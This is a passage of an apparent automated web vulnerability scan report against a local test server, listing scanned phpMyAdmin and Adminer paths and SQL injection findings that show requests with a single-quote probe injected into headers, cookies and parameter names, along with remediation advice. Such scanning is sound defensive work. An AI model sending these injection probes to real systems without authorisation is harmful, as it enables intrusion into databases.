19.324. http://localhost/phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js [URL path folder 4]

19.325. http://localhost/phpmyadmin/js/vendor/jquery/jquery.debounce-1.0.5.js [URL path filename]

19.326. http://localhost/phpmyadmin/js/vendor/jquery/jquery.debounce-1.0.5.js [URL path folder 1]

19.327. http://localhost/phpmyadmin/js/vendor/jquery/jquery.debounce-1.0.5.js [URL path folder 2]

19.328. http://localhost/phpmyadmin/js/vendor/jquery/jquery.debounce-1.0.5.js [URL path folder 3]

19.329. http://localhost/phpmyadmin/js/vendor/jquery/jquery.debounce-1.0.5.js [URL path folder 4]

19.330. http://localhost/phpmyadmin/js/vendor/jquery/jquery.event.drag-2.2.js [URL path filename]

19.331. http://localhost/phpmyadmin/js/vendor/jquery/jquery.event.drag-2.2.js [URL path folder 1]

19.332. http://localhost/phpmyadmin/js/vendor/jquery/jquery.event.drag-2.2.js [URL path folder 2]

19.333. http://localhost/phpmyadmin/js/vendor/jquery/jquery.event.drag-2.2.js [URL path folder 3]

19.334. http://localhost/phpmyadmin/js/vendor/jquery/jquery.event.drag-2.2.js [URL path folder 4]

19.335. http://localhost/phpmyadmin/js/vendor/jquery/jquery.min.js [URL path filename]

19.336. http://localhost/phpmyadmin/js/vendor/jquery/jquery.min.js [URL path folder 1]

19.337. http://localhost/phpmyadmin/js/vendor/jquery/jquery.min.js [URL path folder 2]

19.338. http://localhost/phpmyadmin/js/vendor/jquery/jquery.min.js [URL path folder 3]

19.339. http://localhost/phpmyadmin/js/vendor/jquery/jquery.min.js [URL path folder 4]

19.340. http://localhost/phpmyadmin/js/vendor/jquery/jquery.mousewheel.js [URL path filename]

19.341. http://localhost/phpmyadmin/js/vendor/jquery/jquery.mousewheel.js [URL path folder 1]

19.342. http://localhost/phpmyadmin/js/vendor/jquery/jquery.mousewheel.js [URL path folder 2]

19.343. http://localhost/phpmyadmin/js/vendor/jquery/jquery.mousewheel.js [URL path folder 3]

19.344. http://localhost/phpmyadmin/js/vendor/jquery/jquery.mousewheel.js [URL path folder 4]

19.345. http://localhost/phpmyadmin/js/vendor/jquery/jquery.validate.js [URL path filename]

19.346. http://localhost/phpmyadmin/js/vendor/jquery/jquery.validate.js [URL path folder 1]

19.347. http://localhost/phpmyadmin/js/vendor/jquery/jquery.validate.js [URL path folder 2]

19.348. http://localhost/phpmyadmin/js/vendor/jquery/jquery.validate.js [URL path folder 3]

19.349. http://localhost/phpmyadmin/js/vendor/jquery/jquery.validate.js [URL path folder 4]

19.350. http://localhost/phpmyadmin/js/vendor/js.cookie.js [URL path filename]

19.351. http://localhost/phpmyadmin/js/vendor/js.cookie.js [URL path folder 1]

19.352. http://localhost/phpmyadmin/js/vendor/js.cookie.js [URL path folder 2]

19.353. http://localhost/phpmyadmin/js/vendor/js.cookie.js [URL path folder 3]

19.354. http://localhost/phpmyadmin/js/vendor/sprintf.js [URL path filename]

19.355. http://localhost/phpmyadmin/js/vendor/sprintf.js [URL path folder 1]

19.356. http://localhost/phpmyadmin/js/vendor/sprintf.js [URL path folder 2]

19.357. http://localhost/phpmyadmin/js/vendor/sprintf.js [URL path folder 3]

19.358. http://localhost/phpmyadmin/js/vendor/tracekit.js [URL path filename]

19.359. http://localhost/phpmyadmin/js/vendor/tracekit.js [URL path folder 1]

19.360. http://localhost/phpmyadmin/js/vendor/tracekit.js [URL path folder 2]

19.361. http://localhost/phpmyadmin/js/vendor/tracekit.js [URL path folder 3]

19.362. http://localhost/phpmyadmin/js/whitelist.php [URL path filename]

19.363. http://localhost/phpmyadmin/js/whitelist.php [URL path folder 1]

19.364. http://localhost/phpmyadmin/js/whitelist.php [URL path folder 2]

19.365. http://localhost/phpmyadmin/js/whitelist.php [name of an arbitrarily supplied URL parameter]

19.366. http://localhost/phpmyadmin/setup/ [URL path folder 2]

19.367. http://localhost/phpmyadmin/sql/ [URL path folder 2]

19.368. http://localhost/phpmyadmin/themes/ [URL path folder 2]

19.369. http://localhost/phpmyadmin/url.php [URL path filename]

19.370. http://localhost/phpmyadmin/url.php [URL path folder 1]

19.371. http://localhost/phpmyadmin/url.php [name of an arbitrarily supplied URL parameter]

19.372. http://localhost/phpmyadmin/url.php [url parameter]

19.373. http://localhost/phpmyadmin/vendor/bacon/bacon-qr-code/tests/phpunit [URL path filename]

19.374. http://localhost/phpmyadmin/vendor/bacon/bacon-qr-code/tests/phpunit [URL path folder 1]

19.375. http://localhost/phpmyadmin/vendor/bacon/bacon-qr-code/tests/phpunit [URL path folder 2]

19.376. http://localhost/phpmyadmin/vendor/bacon/bacon-qr-code/tests/phpunit [URL path folder 3]

19.377. http://localhost/phpmyadmin/vendor/bacon/bacon-qr-code/tests/phpunit [URL path folder 4]

19.378. http://localhost/phpmyadmin/vendor/bacon/bacon-qr-code/tests/phpunit [URL path folder 5]

19.379. http://localhost/phpsysinfo/index.php [URL path filename]

19.380. http://localhost/phpsysinfo/index.php [URL path folder 1]

19.381. http://localhost/phpsysinfo/index.php [name of an arbitrarily supplied URL parameter]

20. Cross-domain Referer leakage

20.1. http://localhost/

20.2. http://localhost/

20.3. http://localhost/phpmyadmin/doc/html/search.html

20.4. http://localhost/phpsysinfo/index.php

21. Frameable response (potential Clickjacking)

21.1. http://localhost/

21.2. http://localhost/examplewebiste/vulnerabilities/csrf/

22. Browser cross-site scripting filter disabled

23. HTTP TRACE method is enabled

24. Link manipulation (reflected)

25. DOM data manipulation (DOM-based)

26. Directory listing

27. Email addresses disclosed

28. HTML does not specify charset

28.1. http://localhost/examplewebiste/docs/pdf

28.2. http://localhost/examplewebiste/docs/pdf.html


1. SQL injection

There are 25 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterized queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterized queries. It is strongly recommended that you parameterize every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:


1.1. http://localhost/adminer [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adminer HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
Referer: https://example.com/'

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=lg8lutgtng09da63f83g0brbrk; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=8e8e32f422c19c735310c18847f50d39; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-N2RmMDU0MTA1N2Q3ZGQ4YTc2Y2RlMjlmMzc3YzIwODE=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...

1.2. http://localhost/adminer [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adminer HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:49 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=ebl49valm8e3t3luaj9gj1i77l; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=1737cd8afcfb5861a9dac85f4750e149; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-OTE4NjNiYzQ4ZGYxZjNhN2U2ZTg5YWZkNDQ4ZjM1OWU=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4323
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...

1.3. http://localhost/adminer [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adminer?1'=1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=f5hj5748l3adcbos0fubfmjamg; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=3699917b1d6762a6017930caae341fec; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MDVjZGRlYjJlOGE4M2FkYTE0NWJiOWJhMDM4MWQ2YjM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4323
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...

1.4. http://localhost/adminer/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adminer/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/?lang=czech'

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:54 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=69a01bj7e2pe5m1poc91p67os6; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=9cb021c428caa6f98e0d71d33d47c873; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-ZTY0ZmM0MmU2M2Q2ZTMyODdhNGEyZWY1OGFkZWMwZGM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...

1.5. http://localhost/adminer/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adminer/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://localhost/?lang=czech

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=mboqdtg7k6t958hlp2q17lvssu; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=23a2c5ea1c523b33b80fa9d2caaf254e; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NjdlYTBmY2Q4ZWRiYzZiZTI2OGJiZTNjNGI3NmQ3ZWM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4323
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...

1.6. http://localhost/adminer/ [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /adminer/?1'=1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/?lang=czech

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=smjkqe533cqngmde7n3af1vcpr; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=a443604b314755ce721033019a490a2b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-Y2YwMjA1NzFiYzk1OWZiMjliMzA3YTgwYjUyNDFmNWY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...

1.7. http://localhost/adminer/adminer-4.6.3.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php'
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang=en&token=240285%3a176068

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:09:33 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:09:33 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NzQ5NWUwNWY1MTRjN2Q4ZGNhYWViNTYwZWQyYTVhYzg=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4325
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...

1.8. http://localhost/adminer/adminer-4.6.3.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang=en&token=240285%3a176068

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:08:54 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:08:54 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NWIyMzBhOTVkNzJjOGZkNTFmMWRhZWM1MjAzNTVkODg=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...

1.9. http://localhost/adminer/adminer-4.6.3.php [adminer_key cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The adminer_key cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the adminer_key cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f'

lang=en&token=240285%3a176068

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:05:19 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f%27; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MGM5NzM4NDdlMTI5NWJmOWJkYjEwYWFkY2U0M2NhZTA=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4320
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...

1.10. http://localhost/adminer/adminer-4.6.3.php [adminer_lang cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The adminer_lang cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the adminer_lang cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=qfd3ckvk0mlk5hrpl41rj5kln4; adminer_key=67912841158106235c36bdcddfcda778; adminer_lang=bg'

lang=bg&token=815669%3a574877

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:06:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=bg; expires=Sat, 17 Nov 2018 21:06:36 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=67912841158106235c36bdcddfcda778; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-OTg1ZjYyNjY2NGY3ZmQyNDYyNDllNmM1M2YyNzRmMWI=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4400
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="bg" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>........ - Adminer</title>
<link rel="style
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...

1.11. http://localhost/adminer/adminer-4.6.3.php [adminer_permanent cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The adminer_permanent cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the adminer_permanent cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent='

lang=en&token=271469%3a613140

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:14:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:14:29 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=%27; expires=Sat, 17 Nov 2018 21:14:29 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
